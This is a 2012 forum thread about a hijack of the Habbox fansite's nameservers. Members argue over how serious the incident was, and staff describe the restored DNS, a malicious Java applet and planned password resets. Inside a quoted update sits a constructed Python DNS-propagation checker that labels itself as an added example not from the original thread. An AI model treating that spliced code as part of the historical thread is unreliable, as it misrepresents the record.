I'm actually not entirely sure what this is meant to achieve, Matt is hardly super server admin, sure he's more technically adept than most but stuff like that has never been the General Manager's responsibility. From what I've heard a lot of the past restrictions on access are being eased anyway but to say that Matt should have access to control Habbox's domain is insane. Jin is actually being more reachable recently than he has in the past and from what I understand Sierk was reachable for this also. Just because they're not making daily posts on the forum does not mean they're inactive.

If Jin's more reachable now then that's fantastic, but if it's anything like it was last year then god help everyone. Whether it's Matt or someone else (when I was around my argument was always for @Hoteluser to get full access to everything but y'know that can't happen now) it would be much easier for these kinds of situations. I mean, the site's still not back up - what's that about?

GommeInc
04-06-2012, 11:48 PM
*snip*
It is sort of serious, DNS shouldn't be changed through simple e-mail communications. It seemed to have taken quite a long time to get it sorted, and you yourself have stated that it's not going to do Habbox any favours. I sense you're a bit fed up with all these problems appearing every other week, and have just given up caring :P


If Jin's more reachable now then that's fantastic, but if it's anything like it was last year then god help everyone. Whether it's Matt or someone else (when I was around my argument was always for @Hoteluser to get full access to everything but y'know that can't happen now) it would be much easier for these kinds of situations. I mean, the site's still not back up - what's that about?
It would be nice if they could sell it off to a group of people who are passionate about the website and the community, but unfortunately life isn't that simple :P

xxMATTGxx
04-06-2012, 11:50 PM
If Jin's more reachable now then that's fantastic, but if it's anything like it was last year then god help everyone. Whether it's Matt or someone else (when I was around my argument was always for @Hoteluser to get full access to everything but y'know that can't happen now) it would be much easier for these kinds of situations. I mean, the site's still not back up - what's that about?

In regards of the site not being back up, there is good reason and this explains it:


Update (21:55):

The nameservers have been corrected and are now pointing again to the Habbox server. The DNS should propagate totally within the next 24 hours and this does mean you won't be able to see the Habbox site straight away. It depends on how fast your DNS is.

While we wait for the DNS to propagate we will be keeping the downtime page up throughout the night and into tomorrow. The Habbox downtime page looks like the following:


http://mattgarner.net/upload/images/2012/06/04/tO9D7.png


As before, DO NOT run any Java files if they appear on the Habbox.com site. We will NEVER ask for something like that to be run on the Habbox.com website. We appreciate your patience during this time and we will be back very soon
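A way to check the propagation described in the update above, as an added example that is not part of the original thread: it parses `dig +noall +answer`-style NS answers collected from several resolvers and flags any resolver still returning a delegation outside the expected set. The domain, nameserver hostnames, resolver labels and answer text are all constructed placeholders.

```python
import re
from dataclasses import dataclass

# Assumption: the delegation the site owner expects (placeholder hostnames).
EXPECTED_NS = frozenset({"ns1.expected-host.example", "ns2.expected-host.example"})

# Constructed answers, in the format `dig +noall +answer NS <domain> @<resolver>` prints.
# The TTL column from a recursive resolver is the time left before its cache expires.
SAMPLE_ANSWERS = {
    "resolver-a": (
        "fansite.example.\t86400\tIN\tNS\tns1.expected-host.example.\n"
        "fansite.example.\t86400\tIN\tNS\tns2.expected-host.example.\n"
    ),
    "resolver-b": (  # still caching the rogue delegation
        "fansite.example.\t41210\tIN\tNS\tns1.rogue-host.example.\n"
        "fansite.example.\t41210\tIN\tNS\tNS2.Rogue-Host.example.\n"
    ),
    "resolver-c": ";; connection timed out; no servers could be reached\n",
    "resolver-d": (  # inconsistent answer: one expected, one rogue
        "fansite.example.\t300\tIN\tNS\tns1.expected-host.example.\n"
        "fansite.example.\t1200\tIN\tNS\tns1.rogue-host.example.\n"
    ),
}

NS_LINE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+NS\s+(\S+)$", re.IGNORECASE)


@dataclass(frozen=True)
class NSRecord:
    owner: str
    ttl: int
    target: str


def _norm(name):
    """DNS names are case-insensitive; drop the trailing root dot."""
    return name.rstrip(".").lower()


def parse_ns_answer(text):
    """Extract NS records from dig-style answer text, skipping comments."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        match = NS_LINE.match(line)
        if match:
            owner, ttl, target = match.groups()
            records.append(NSRecord(_norm(owner), int(ttl), _norm(target)))
    return records


def classify(records, expected=EXPECTED_NS):
    """ok: only expected servers; drift: none expected; mixed: both kinds."""
    targets = {r.target for r in records}
    if not targets:
        return "no-data"
    if targets <= expected:
        return "ok"
    return "mixed" if targets & expected else "drift"


def propagation_report(answers, expected=EXPECTED_NS):
    """Summarise which resolvers still hand out an unexpected delegation."""
    status, unexpected, max_stale_ttl = {}, set(), 0
    for resolver, text in answers.items():
        records = parse_ns_answer(text)
        status[resolver] = classify(records, expected)
        for record in records:
            if record.target not in expected:
                unexpected.add(record.target)
                # Upper bound on how long this cache keeps the stale record.
                max_stale_ttl = max(max_stale_ttl, record.ttl)
    return {
        "status": status,
        "unexpected": sorted(unexpected),
        "max_stale_ttl": max_stale_ttl,
        "fully_propagated": all(s == "ok" for s in status.values()),
    }


if __name__ == "__main__":
    report = propagation_report(SAMPLE_ANSWERS)
    for resolver, state in report["status"].items():
        print(f"{resolver}: {state}")
    print("unexpected nameservers:", report["unexpected"])
    print("stale caches expire within (s):", report["max_stale_ttl"])
```
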

Chippiewill
04-06-2012, 11:50 PM
Whether it's Matt or someone else (when I was around my argument was always for @Hoteluser to get full access to everything but y'know that can't happen now) it would be much easier for these kinds of situations. I mean, the site's still not back up - what's that about?

Recursion is getting root access afaik.

Recursion
04-06-2012, 11:51 PM
Oh, my dear, yes I do. Is playing "teen tech genius" to the few others who care enough to read in to your message protecting anything? No, it's feeding your ego. Perhaps you get off on exciting (not so clever) takeovers of sagging fansites for an antique online community. Maybe it's very thrilling for you to decide whether or not this can be considered an 'exploit' or not. I guess there is the possibility that when you can't get credibility on a forum dedicated to this sort of thing, it feels good to big up what you read about on a forum that hires staff who post in Spam asking for REP. I really can't be sure.

The point of my post is that the reaction to what happened was melodramatic and this thread is as well. It is not a big deal. It has been done and the userbase's information is safe as of now. There needn't be a sixty post analysis on who dare did this and how in the world they managed this evil plan. It's Habbox, get a grip.

And I bet you would be one of the first in the queue of people complaining in the Feedback forum should our database have been leaked last night about how we should be more careful with your personal information. Funnily enough, Habbox may well be a kid's fansite or whatever, but (un)fortunately we're still bound by the various UK laws, still have a responsibility to protect our users and their information and also to continue providing a good service and not just disappear overnight, as many fansites do. If it wasn't for sites like Habbox or other projects I've been involved in, I wouldn't know nearly as much as I do now, technically, and certainly wouldn't be applying for the jobs I have been recently.

Believe me, I have far bigger and better things to be doing than sitting around here helping out Habbox in any way, but I choose to because I like to have input into these things and I've seen Habbox grow (almost) right from the beginning. My ego is already as big as I need it be, I don't need to put any effort into making it any bigger, thank you very much.

Hecktix
04-06-2012, 11:52 PM
It is sort of serious, DNS shouldn't be changed through simple e-mail communications. It seemed to have taken quite a long time to get it sorted, and you yourself have stated that it's not going to do Habbox any favours. I sense you're a bit fed up with all these problems appearing every other week, and have just given up caring :P


It would be nice if they could sell it off to a group of people who are passionate about the website and the community, but unfortunately life isn't that simple :P

Well this was always going to be the issue... I just wonder how much longer Habbox would have lasted had Jin not become Co-Owner, yet even Jin is going to want to move on eventually


In regards of the site not being back up, there is good reason and this explains it:

Thanks

jasey
04-06-2012, 11:52 PM
I'm not going to write loads back but anyone who believes this is minor needs to check on what actually happened in the first place.

If this is NameCheap's doing, then that is off-putting and something to be discussed. Involving Habbox in to it as if some bastion of gold has been broken in to and all of it was stolen is silly. Habbox is not important anymore if it ever could be considered that. Do let the traffic reports speak and not the people who still have their lives invested in a rusty endeavour. Even if NameCheap did this, I would bet they had a twit of a staff member behind this and the company will surely condemn what happened. I'm certain you can remember a few of the crazy staff members Habbox has had in the past who have done bad things. You've been here as long as I have. Habbox is nothing to sweat over in this case.

xxMATTGxx
04-06-2012, 11:53 PM
If this is NameCheap's doing, then that is off-putting and something to be discussed. Involving Habbox in to it as if some bastion of gold has been broken in to and all of it was stolen is silly. Habbox is not important anymore if it ever could be considered that. Do let the traffic reports speak and not the people who still have their lives invested in a rusty endeavour. Even if NameCheap did this, I would bet they had a twit of a staff member behind this and the company will surely condemn what happened. I'm certain you can remember a few of the crazy staff members Habbox has had in the past who have done bad things. You've been here as long as I have. Habbox is nothing to sweat over in this case.

In your own eyes Habbox may not be important but the site still has users, to a lot of us who work on this site (including me) we still think Habbox is an important site. The users' information throughout Habbox is very important to keep safe, yes nothing has been stolen or leaked. But regardless of that, this isn't classed as "minor".

Hecktix
04-06-2012, 11:54 PM
Recursion is getting root access afaik.

Yes, have just been told. How many years too late?

HotelUser
04-06-2012, 11:55 PM
Oh, my dear, yes I do. Is playing "teen tech genius" to the few others who care enough to read in to your message protecting anything? No, it's feeding your ego. Perhaps you get off on exciting (not so clever) takeovers of sagging fansites for an antique online community. Maybe it's very thrilling for you to decide whether or not this can be considered an 'exploit' or not. I guess there is the possibility that when you can't get credibility on a forum dedicated to this sort of thing, it feels good to big up what you read about on a forum that hires staff who post in Spam asking for REP. I really can't be sure.

The point of my post is that the reaction to what happened was melodramatic and this thread is as well. It is not a big deal. It has been done and the userbase's information is safe as of now. There needn't be a sixty post analysis on who dare did this and how in the world they managed this evil plan. It's Habbox, get a grip.

Tom's eloquent reply to you, which he made several posts prior, already answers the point you raise about a melodramatic stigma being created because of the Habbox.com nameservers being changed. Tom said that Habbox, like any other website or even business, owes its users a duty of care when it comes to the preservation and security of personal information. Notwithstanding this, any disturbance in website uptime is a problem because it impacts Habbox's functionality.


Now now, you shouldn't criticise code in public.


Neither you nor I vandalized the Habbox.com website in an attempt to exploit its members.



Anybody who is focusing their efforts on stealing a Habbo domain is obviously not a fantastic hacker otherwise they'd be going after higher priority targets who handle card data.


Another fortunate point for Habbox, although regardless when security and site uptime are interfered with it does become a problem nonetheless. So, if we can counter-exploit their exploitation of the fansite by exploiting their failures as a hacker then I say go for it!



I believe Jin has control whenever his hard drive isn't broken and I believe Matt himself thinks he doesn't need major access to the domain.

Ah, so Jin does have domain control? That's good to hear :) Matt's loyal to the fansite and Matt's secure, it's fair on his part if he doesn't want/feels like he should be given that level of access, but I'm still sticking to my opinion that he should have it nonetheless.

jasey
04-06-2012, 11:59 PM
And I bet you would be one of the first in the queue of people complaining in the Feedback forum should our database have been leaked last night about how we should be more careful with your personal information. Funnily enough, Habbox may well be a kid's fansite or whatever, but (un)fortunately we're still bound by the various UK laws, still have a responsibility to protect our users and their information and also to continue providing a good service and not just disappear overnight, as many fansites do. If it wasn't for sites like Habbox or other projects I've been involved in, I wouldn't know nearly as much as I do now, technically, and certainly wouldn't be applying for the jobs I have been recently.

Believe me, I have far bigger and better things to be doing than sitting around here helping out Habbox in any way, but I choose to because I like to have input into these things and I've seen Habbox grow (almost) right from the beginning. My ego is already as big as I need it be, I don't need to put any effort into making it any bigger, thank you very much.

No, I wouldn't be worried about any of my personal information being leaked from Habbox's database because I am not stupid enough to put anything sensitive in to the hands of some volunteer teens who wish they had a tech job that wasn't based out of their bedroom. The things Habbox has in its database on me are so silly that I would post them publicly if I had a reason to. The database leaking would not hurt me at all and it wouldn't hurt anyone else either unless they are thick and don't protect themselves online. This isn't a decade ago — people have been warned everywhere. So, err, yeah — you can cancel that bet if the bookie will let you because I do fear you would be losing a few quid.

I'm glad you learned something from working on Habbox in the past but it is clear that you are above analysing the details of this weak attempt at stealing information from the site besides, as I said already, for the sake of nostalgia. Even if it is because you have a soft spot in your heart for Habbox, you can cut the drama without losing credibility. Some of the "tech" users' posts in this thread border on hysteria. I'm thrilled you are pleased with the size of your ego as well. I am glad you got to see Habbox grow. So did I and so did many other people on the forum, right from the start.

Would you be willing to bet any of the money you were going to place on me caring about my info in Habbox's database on how obvious it is that the site as a whole is far past its apex and is now swirling down the sink?

xxMATTGxx
05-06-2012, 12:00 AM
No, I wouldn't be worried about any of my personal information being leaked from Habbox's database because I am not stupid enough to put anything sensitive in to the hands of some volunteer teens who wish they had a tech job that wasn't based out of their bedroom. The things Habbox has in its database on me are so silly that I would post them publicly if I had a reason to. The database leaking would not hurt me at all and it wouldn't hurt anyone else either unless they are thick and don't protect themselves online. This isn't a decade ago — people have been warned everywhere. So, err, yeah — you can cancel that bet if the bookie will let you because I do fear you would be losing a few quid.

I'm glad you learned something from working on Habbox in the past but it is clear that you are above analysing the details of this weak attempt at stealing information from the site besides, as I said already, for the sake of nostalgia. Even if it is because you have a soft spot in your heart for Habbox, you can cut the drama without losing credibility. Some of the "tech" users' posts in this thread border on hysteria. I'm thrilled you are pleased with the size of your ego as well. I am glad you got to see Habbox grow. So did I and so did many other people on the forum, right from the start.

Would you be willing to bet any of the money you were going to place on me caring about my info in Habbox's database on how obvious it is that the site as a whole is far past its apex and is now swirling down the sink?

Don't make such comments when you don't know us at all in real life. Two people who are working for us as Site Coders and doing other various roles have jobs in real life working with servers and development. The reason why they are working for Habbox is because they know what they are actually doing and do take pride in their work.

You may not care about your personal information but Habbox does, we have to care for everyone who has ever signed up onto our website regardless if they give a damn or not. We have to follow laws and we do that because we care.

Hecktix
05-06-2012, 12:02 AM
Don't make such comments when you don't know us at all in real life. Two people who are working for us as Site Coders and doing other various roles have jobs in real life working with servers and development. The reason why they are working for Habbox is because they know what they are actually doing and do take pride in their work.

I wouldn't have even justified replying to that moronic comment Matt, don't feed the trolls eh ;)

GommeInc
05-06-2012, 12:03 AM
jasey - Passwords, e-mails, user names... It may not seem like much, but when the Playstation Network was compromised, the usernames, passwords and e-mails could have been used to gain entry elsewhere. In this case, someone could have their username linked to their Playstation Account (which many do) and through some magic find out how to gain entry and so forth. It's unlikely, but possible. I'm not finding it that big a deal, and I wouldn't say the people here at Habbox are either - they seem to be handling it quite well given the limitations - no drama, just honesty and swift handling of the event. They seem quite annoyed that Namecheap were so careless, and rightly so :P

jasey
05-06-2012, 12:04 AM
In your own eyes Habbox may not be important but the site still has users, to a lot of us who work on this site (including me) we still think Habbox is an important site. The users' information throughout Habbox is very important to keep safe, yes nothing has been stolen or leaked. But regardless of that, this isn't classed as "minor".

It is incredibly minor. Half the active users on this forum are staff as well. I suppose you still have aspirations and perhaps delusions about what Habbox can become and what it is, but as I said, in the grand scheme of things it isn't major. There have been worse attacks against Habbox in the past and having a talk circle about the whole thing after we have the alarmist warnings about the tragedy of what has happened just pushes it over the edge. Read the news or something and then try to realise what is major — it is certainly not a site with a few hundred active users being compromised by a script kiddie. In fact, I think the care put in to this by the six or seven people in this thread that are flippant comprises most of the care put in to this in total. It is pretty telling when the only people going on about this against what I am saying are people who are invested in the site itself.

Do they give you a sceptre to go along with your 'Management' userbar, Matt?

xxMATTGxx
05-06-2012, 12:05 AM
It is incredibly minor. Half the active users on this forum are staff as well. I suppose you still have aspirations and perhaps delusions about what Habbox can become and what it is, but as I said, in the grand scheme of things it isn't major. There have been worse attacks against Habbox in the past and having a talk circle about the whole thing after we have the alarmist warnings about the tragedy of what has happened just pushes it over the edge. Read the news or something and then try to realise what is major — it is certainly not a site with a few hundred active users being compromised by a script kiddie. In fact, I think the care put in to this by the six or seven people in this thread that are flippant comprises most of the care put in to this in total. It is pretty telling when the only people going on about this against what I am saying are people who are invested in the site itself.

Do they give you a sceptre to go along with your 'Management' userbar, Matt?

You didn't have to post in this thread at all, stop being a troll.

iAdam
05-06-2012, 12:05 AM
No, I wouldn't be worried about any of my personal information being leaked from Habbox's database because I am not stupid enough to put anything sensitive in to the hands of some volunteer teens who wish they had a tech job that wasn't based out of their bedroom. The things Habbox has in its database on me are so silly that I would post them publicly if I had a reason to. The database leaking would not hurt me at all and it wouldn't hurt anyone else either unless they are thick and don't protect themselves online. This isn't a decade ago — people have been warned everywhere. So, err, yeah — you can cancel that bet if the bookie will let you because I do fear you would be losing a few quid.

I'm glad you learned something from working on Habbox in the past but it is clear that you are above analysing the details of this weak attempt at stealing information from the site besides, as I said already, for the sake of nostalgia. Even if it is because you have a soft spot in your heart for Habbox, you can cut the drama without losing credibility. Some of the "tech" users' posts in this thread border on hysteria. I'm thrilled you are pleased with the size of your ego as well. I am glad you got to see Habbox grow. So did I and so did many other people on the forum, right from the start.

Would you be willing to bet any of the money you were going to place on me caring about my info in Habbox's database on how obvious it is that the site as a whole is far past its apex and is now swirling down the sink?

Erm hi there. I do actually work a tech job and I'm helping out Habbox at the same time.

Just my two pence now... Would you rather us not investigate it at all? Because from what you're saying you're actually criticising us for doing what we're meant to do. We only know it was a feeble attempt at gaining information because we looked into it. Recursion spent the best part of a day looking into it actually. It's good that you've not put any sensitive data into the database because we haven't really asked you for any. Good to know you're using the service as you're meant to. I'll rewager that bet and say you would have been one of the first to criticise if we didn't know what the hell was going on last night, yes?

Chippiewill
05-06-2012, 12:06 AM
Matt's loyal to the fansite and Matt's secure, it's fair on his part if he doesn't want/feels like he should be given that level of access, but I'm still sticking to my opinion that he should have it nonetheless.

I agree that Matt is certainly trustworthy enough. But as a programmer you should be aware that taking unnecessary and un-useful security risks just because it shouldn't be an issue is a bad idea.

jasey
05-06-2012, 12:07 AM
jasey - Passwords, e-mails, user names... It may not seem like much, but when the Playstation Network was compromised, the usernames, passwords and e-mails could have been used to gain entry elsewhere. In this case, someone could have their username linked to their Playstation Account (which many do) and through some magic find out how to gain entry and so forth. It's unlikely, but possible. I'm not finding it that big a deal, and I wouldn't say the people here at Habbox are either - they seem to be handling it quite well given the limitations - no drama, just honesty and swift handling of the event. They seem quite annoyed that Namecheap were so careless, and rightly so :P

Right. First off, compare the size of Habbox's userbase and the PSN userbase. Huge difference. Like, such a huge difference that Habbox is wiped off of the map in comparison. Secondly, anyone who is stupid enough in 2012 to put anything sensitive or exploitable on to a site like Habbox is careless or ignorant. I do agree that it is important to protect the information of your userbase, but really? This is not as big of a deal as people are making it out to be. This is Habbox and I am still waiting to see any serious damage from this evil act by a terrible hacker besides chips on the egos of those who manage the site. I can't stress that enough.

xxMATTGxx
05-06-2012, 12:07 AM
Right. First off, compare the size of Habbox's userbase and the PSN userbase. Huge difference. Like, such a huge difference that Habbox is wiped off of the map in comparison. Secondly, anyone who is stupid enough in 2012 to put anything sensitive or exploitable on to a site like Habbox is careless or ignorant. I do agree that it is important to protect the information of your userbase, but really? This is not as big of a deal as people are making it out to be. This is Habbox and I am still waiting to see any serious damage from this evil act by a terrible hacker besides chips on the egos of those who manage the site. I can't stress that enough.

There are still around 9000 accounts on Habbox.com, that is still a big number. And yes there are still people around in 2012 who aren't experts in security and may not know how to protect themselves fully. We still have to deal with those users regardless if we like to or not.

Recursion
05-06-2012, 12:08 AM
No, I wouldn't be worried about any of my personal information being leaked from Habbox's database because I am not stupid enough to put anything sensitive in to the hands of some volunteer teens who wish they had a tech job that wasn't based out of their bedroom. The things Habbox has in its database on me are so silly that I would post them publicly if I had a reason to. The database leaking would not hurt me at all and it wouldn't hurt anyone else either unless they are thick and don't protect themselves online. This isn't a decade ago — people have been warned everywhere. So, err, yeah — you can cancel that bet if the bookie will let you because I do fear you would be losing a few quid.

I'm glad you learned something from working on Habbox in the past but it is clear that you are above analysing the details of this weak attempt at stealing information from the site besides, as I said already, for the sake of nostalgia. Even if it is because you have a soft spot in your heart for Habbox, you can cut the drama without losing credibility. Some of the "tech" users' posts in this thread border on hysteria. I'm thrilled you are pleased with the size of your ego as well. I am glad you got to see Habbox grow. So did I and so did many other people on the forum, right from the start.

Would you be willing to bet any of the money you were going to place on me caring about my info in Habbox's database on how obvious it is that the site as a whole is far past its apex and is now swirling down the sink?

Well, unfortunately for you, there are many users who do trust us and who do wish their information to be kept private wherever possible, which is something we'd like to keep that way. Thankfully, I can't take any offence to your post because actually, I (as does iAdam and others) do have a day job, which is technical and I worked my way into because I am a "techie" and must at least have a clue what I'm doing, which is obviously more than can be said for some people around here. In terms of personal information, passwords and the like, the same problems exist today as they did a decade ago... humans aren't perfect, we're naturally lazy and like to use the same password for many different services.

I'd like to know how this is for the sake of nostalgia, the site is still active (in fact one of the most active Habbo fansites) and over the years a very large community of people who never have done (or no longer do) play Habbo has formed who wish to continue being a part of the Habbox community (one of which, is me). Any "breach" (I use quotes, you seem to like those) is serious, no matter how much information has been stolen and we do take them seriously, as should everyone, which is exactly why we'll be forcing password resets across the entire Habbox.com website.

Habbox aside, you may not take something like this seriously, but fortunately for the world there are people who do and make massive amounts of money doing it and your argument is fundamentally flawed.

Chippiewill
05-06-2012, 12:09 AM
There are still around 9000 accounts on Habbox.com, that is still a big number. And yes there are still people around in 2012 who aren't experts in security and may not know how to protect themselves fully. We still have to deal with those users regardless if we like to or not.

I REGRET NOTHING!!!!!!!!!!

http://www.youtube.com/watch?v=SiMHTK15Pik

Edited by Martin (Forum Super Moderator): Please do not make off topic posts

Hecktix
05-06-2012, 12:09 AM
I agree that Matt is certainly trustworthy enough. But as a programmer you should be aware that taking unnecessary and un-useful security risks just because it shouldn't be an issue is a bad idea.

If not Matt then give it to someone else, like Recursion who is the only person other than Jin and Sierk to be granted access to Habbox's servers since ---MAD--- and that's only happened very recently. If that had happened much earlier, many problems could have been solved. There needs to be someone who has full access to everything, who is trustworthy and not one of the twenty-something owners who have little interest in being online and are simply not able to be immediately available.

scottish
05-06-2012, 12:10 AM
In regards of the site not being back up, there is good reason and this explains it:

Wait, so it took over 24 hours to get sierk to change the DNS...

cba reading the other idiots posts.

jasey
05-06-2012, 12:10 AM
Erm hi there. I do actually work a tech job and I'm helping out habbox at the same time.

Just my two pence now... Would you rather us not investigate it at all? because from what you're saying you're actually criticising us for doing what we're meant to do. We only know it was a feeble attempt at gaining information because we looked into it. Recursion spent the best part of a day looking into it actually. It's good that you've not put any sensitive data into the database because we haven't really asked you for any. Good to know you're using the service as you're meant to. I'll rewager that bet and say you would have been one of the first to criticise if we didn't know what the hell was going on last night, yes?

No, frankly, I wouldn't care. My heart hasn't been in this site for a long time and I know I am speaking for quite a lot of active users when I say that. If Habbox goes, it goes. In fact, it's not an 'if' but rather a 'when'. I hate to be the realist, of course. I'd stay clear of making that bet in any case.

I'm all for you investigating this but it doesn't need to be plastered in public with people acting like it is more terrible than it is. Certainly, if you want to play internet detective then do it somewhere you can all play together without people seeing the Habbox tech team peeing contest.

xxMATTGxx
05-06-2012, 12:10 AM
Wait, so it took over 24 hours to get sierk to change the DNS...

cba reading the other idiots posts.

Jin would normally have access but as mentioned in another post he lost the details due to recent hard drive failures and this caused the name servers not being changed straight away.


No, frankly, I wouldn't care. My heart hasn't been in this site for a long time and I know I am speaking for quite a lot of active users when I say that. If Habbox goes, it goes. In fact, it's not an 'if' but rather a 'when'. I hate to be the realist, of course. I'd stay clear of making that bet in any case.

I'm all for you investigating this but it doesn't need to be plastered in public with people acting like it is more terrible than it is. Certainly, if you want to play internet detective then do it somewhere you can all play together without people seeing the Habbox tech team peeing contest.

You did not have to post in this thread at all, the discussion was actually going on fine to be honest.

GommeInc
05-06-2012, 12:11 AM
Right. First off, compare the size of Habbox's userbase and the PSN userbase. Huge difference. Like, such a huge difference that Habbox is wiped off of the map in comparison. Secondly, anyone who is stupid enough in 2012 to put anything sensitive or exploitable on to a site like Habbox is careless or ignorant. I do agree that it is important to protect the information of your userbase, but really? This is not as big of a deal as people are making it out to be. This is Habbox and I am still waiting to see any serious damage from this evil act by a terrible hacker besides chips on the egos of those who manage the site. I can't stress that enough.
I thought you would make that comparison yet you've seen it the wrong way. Habbox is a minor site, which is "easy pickings". Find the e-mail, the username and any information that can lead to a take over of more important accounts such as PSN accounts and there you have it, you've done little to no leg work. Would you rather attack the FBI straight on, or find a minor character and enter easily? Same thing, and all too common in this day and age.

EDIT: An obvious example can also be what happens on Habbo far too often. Find the e-mail associated with it > take over the account or just use the e-mail to find out their Facebook and so forth. Habbo have been known to change e-mail addresses on Habbo accounts if you e-mail them and make a persuasive argument.

iAdam
05-06-2012, 12:15 AM
No, frankly, I wouldn't care. My heart hasn't been in this site for a long time and I know I am speaking for quite a lot of active users when I say that. If Habbox goes, it goes. In fact, it's not an 'if' but rather a 'when'. I hate to be the realist, of course. I'd stay clear of making that bet in any case.

I'm all for you investigating this but it doesn't need to be plastered in public with people acting like it is more terrible than it is. Certainly, if you want to play internet detective then do it somewhere you can all play together without people seeing the Habbox tech team peeing contest.

Mmhmm, you seem to care a lot right now? We never acted like it was more terrible than it was, in fact, I spent most of last night in the help desk advising people that it wasn't anything serious and reset passwords as a precaution if they ran the java app. The java app is in fact malicious so we're setting about advising users what to do if they're infected. Information is key in this which is why information was released. I honestly don't see the problem.

Also, don't worry, we had an awfully fun geek off in a skype chat while Recursion decompiled it for us. It was great.

HotelUser
05-06-2012, 12:16 AM
No, I wouldn't be worried about any of my personal information being leaked from Habbox's database because I am not stupid enough to put anything sensitive in to the hands of some volunteer teens who wish they had a tech job that wasn't based out of their bedroom. The things Habbox has in its database on me are so silly that I would post them publicly if I had a reason to. The database leaking would not hurt me at all and it wouldn't hurt anyone else either unless they are thick and don't protect themselves online. This isn't a decade ago — people have been warned everywhere. So, err, yeah — you can cancel that bet if the bookie will let you because I do fear you would be losing a few quid. I'm glad you learned something from working on Habbox in the past but it is clear that you are above analysing the details of this weak attempt at stealing information from the site besides, as I said already, for the sake of nostalgia. Even if it is because you have a soft spot in your heart for Habbox, you can cut the drama without losing credibility. Some of the "tech" users' posts in this thread border on hysteria. I'm thrilled you are pleased with the size of your ego as well. I am glad you got to see Habbox grow. So did I and so did many other people on the forum, right from the start.

Would you be willing to bet any of the money you were going to place on me caring about my info in Habbox's database on how obvious it is that the site as a whole is far past its apex and is now swirling down the sink?


First of all-- there's nothing wrong with wanting to work in the computer science industry and there's nothing wrong with saying or expressing you want to work in the computer science industry. Second, instead of insulting my friend Tom in a novel like fashion by doing things like calling him a teen volunteer with a stupid dream you should be saying that to me. I (hi!) developed how content is stored on Habbox.com. Passwords stored in the Habbox.com as well as forum database are hashed, salted then hashed again. So unless you're uploading nude photos of yourself in the staff uploading section of the website I should hope you have nothing to fear of a database leak.

I don't know how many times I, Matt, Tom, Chip or anyone else can tell you this before you comprehend it: Habbox cares about its uptime and protecting users from harm's way where possible. Until you develop an argument focused around why Habbox should be a heartless zombie who doesn't care if we're affiliated with hackers, then your macho "I'm smarter than everyone who cares what happens to Habbox" attitude is completely redundant.

jasey
05-06-2012, 12:26 AM
Well, unfortunately for you, there are many users who do trust us and who do wish their information to be kept private wherever possible, which is something we'd like to keep that way. Thankfully, I can't take any offence to your post because actually, I (as does iAdam and others) do have a day job, which is technical and I worked my way into because I am a "techie" and must at least have a clue what I'm doing, which is obviously more than can be said for some people around here. In terms of personal information, passwords and the like, the same problems exist today as they did a decade ago... humans aren't perfect, we're naturally lazy and like to use the same password for many different services.

I'd like to know how this is for the sake of nostalgia, the site is still active (in fact one of the most active Habbo fansites) and over the years a very large community of people who never have done (or no longer do) play Habbo has formed who wish to continue being a part of the Habbox community (one of which, is me). Any "breach" (I use quotes, you seem to like those) is serious, no matter how much information has been stolen and we do take them seriously, as should everyone, which is exactly why we'll be forcing password resets across the entire Habbox.com website.

Habbox aside, you may not take something like this seriously, but fortunately for the world there are people who do and make massive amounts of money doing it and your argument is fundamentally flawed.

I'm going to try to branch out of replying to the cascading rebuttals to my original statement because apparently some people are plagued with delusions of grandeur.

Is that something you think is special, my friend? That is, having a day job. Humans are naturally lazy. It is effort to put on a seatbelt and if you don't then peace be with you as you fly through the smashing car window. It is effort to check the expiry date on food before you eat it and I hope all goes well when you are sitting on the loo or lying in a hospital bed with food poisoning. It is effort to ignore the constant advertisements for food that is intrinsically unhealthy and my thoughts are with the preventable cases of obesity who may be plagued with the side effects of that condition as they age. On the same level, it is effort to use secure passwords for secure sites and different ones for sites managed by overzealous teenagers. My thoughts, specifically ones of pity, sit beside those who lose access to their online finances or something serious like that because their info was leaked from the Habbox database.

You like to avoid the bigger picture, am I right? You are speaking truth when you say that Habbox is one of the biggest Habbo fansites. In perspective, Foula is one of the biggest outlying islands in the Shetlands and I am sure all 31 people that live there — if they even still do, population has been declining — would care very much if someone stole something from one of their houses. Would it make the news in London? I'll let you answer that one.


http://www.readthehook.com/files/old/images/issues/2009/0809/cover-farm-hicks.jpg

I don't know if you are unaware that I have been around this site more or less since its launch and I no longer play Habbo actively. I understand that there is a community that sticks around here but it is a bit telling when the majority of posts on this forum come from the same few dozen people over and over, day by day. How many new users who become very active has Habbox gotten in the last three months?

I do applaud you for recognising my fondness for quotes "because I don't think some people understand what words mean" but when it boils down to things this was about as unserious as a breach can get and doesn't warrant this reaction. My argument is not fundamentally flawed as I have stated that this would be serious had this not been Habbox. PSN? Sure. PayPal? Of course. Habbo itself? Yep. This fansite? No, no one is making massive amounts of money using their scratched up microscopes to argue over the details of what happened. I almost feel like I should pay some people for the laughable things they say.

Recursion
05-06-2012, 12:33 AM
I'm going to try to branch out of replying to the cascading rebuttals to my original statement because apparently some people are plagued with delusions of grandeur.

Is that something you think is special, my friend? That is, having a day job. Humans are naturally lazy. It is effort to put on a seatbelt and if you don't then peace be with you as you fly through the smashing car window. It is effort to check the expiry date on food before you eat it and I hope all goes well when you are sitting on the loo or lying in a hospital bed with food poisoning. It is effort to ignore the constant advertisements for food that is intrinsically unhealthy and my thoughts are with the preventable cases of obesity who may be plagued with the side effects of that condition as they age. On the same level, it is effort to use secure passwords for secure sites and different ones for sites managed by overzealous teenagers. My thoughts, specifically ones of pity, sit beside those who lose access to their online finances or something serious like that because their info was leaked from the Habbox database.

You like to avoid the bigger picture, am I right? You are speaking truth when you say that Habbox is one of the biggest Habbo fansites. In perspective, Foula is one of the biggest outlying islands in the Shetlands and I am sure all 31 people that live there — if they even still do, population has been declining — would care very much if someone stole something from one of their houses. Would it make the news in London? I'll let you answer that one.


http://www.readthehook.com/files/old/images/issues/2009/0809/cover-farm-hicks.jpg

I don't know if you are unaware that I have been around this site more or less since its launch and I no longer play Habbo actively. I understand that there is a community that sticks around here but it is a bit telling when the majority of posts on this forum come from the same few dozen people over and over, day by day. How many new users who become very active has Habbox gotten in the last three months?

